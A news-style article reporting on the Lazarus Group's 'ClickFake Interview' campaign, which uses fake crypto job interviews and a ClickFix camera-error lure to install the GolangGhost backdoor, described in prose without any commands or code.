North Korean state-sponsored hackers, known collectively as the Lazarus Group, have launched a fresh wave of cyberattacks aimed at cryptocurrency developers. These sophisticated campaigns are now leveraging the ClickFix technique, a deceptive method designed to sneak malware onto victims’ devices under the guise of fake job interviews.
Lazarus Expands Its Crypto Crime Arsenal with ClickFix
Lazarus is no stranger to the crypto crime world. Over the past two years, this advanced persistent threat (APT) group has siphoned off nearly $2 billion in digital assets, including a massive $1.5 billion heist from UAE-based Bybit in March 2025 alone.
Historically, Lazarus has targeted individuals involved in the crypto industry, especially software developers. Previous operations—Dream Job, Contagious Interview, and DeceptiveDevelopment—all lured developers into fake recruitment traps. The latest campaign builds on that same formula but adds a new twist.
ClickFake Interview Campaign Imitates Top Crypto Firms
Dubbed ClickFake Interview, this recent wave of attacks appears to be a continuation of the Contagious Interview campaign that first emerged in 2022. It focuses on job seekers in the cryptocurrency field and deploys a Go-based backdoor named GolangGhost to infiltrate victims’ systems.
What makes ClickFake Interview particularly dangerous is its use of ClickFix, a technique that deceives users into installing malware under the pretense of fixing a camera error during a staged online interview.
Here’s How the ClickFix Attack Unfolds
The attack typically begins with a direct message on social media, inviting the target to an online interview for a high-profile job in crypto. The unsuspecting candidate is then directed to a well-crafted fake interview site, often impersonating reputable crypto firms like Coinbase, KuCoin, Ripple, Chainalysis, and Archblock.
Sekoia researchers uncovered 184 unique invitations tied to over a dozen forged websites—all sharing a consistent user interface built using ReactJS. Each page dynamically loads content and tailors the experience based on the fake job listing.
Once on the site, users are prompted to fill out contact details, answer questions, and use their webcam to record an introductory video. But when the candidate tries to enable the camera, an error message pops up—claiming a driver issue—and provides instructions to run a specific code in the Windows command prompt or macOS Terminal. This is the moment when the ClickFix technique is triggered.
What Happens After the Malware Is Installed?
Following these steps leads to the silent installation of GolangGhost, a powerful backdoor malware. Once embedded, it grants Lazarus full access to the victim’s system, enabling the hackers to:
- Upload and download files
- Execute arbitrary shell commands
- Deploy a Chrome browser stealer
- Harvest detailed system information
What’s notable is that the job roles being offered aren’t even technical. According to Sekoia, most positions advertised involve non-technical titles like product manager, asset manager, or DeFi specialist, adding another layer of deception to the scheme.
Growing Threat to the Crypto Ecosystem
This operation underscores the evolving tactics of nation-state hackers. Lazarus continues to blend social engineering, technical manipulation, and brand impersonation to target individuals in the growing cryptocurrency workforce. The use of the ClickFix technique shows how these attackers are constantly refining their malware delivery strategies to bypass traditional defenses.
With the cryptocurrency job market still expanding, and remote interviews now the norm, more professionals could fall into similar traps—unless they stay alert to tactics like ClickFix.
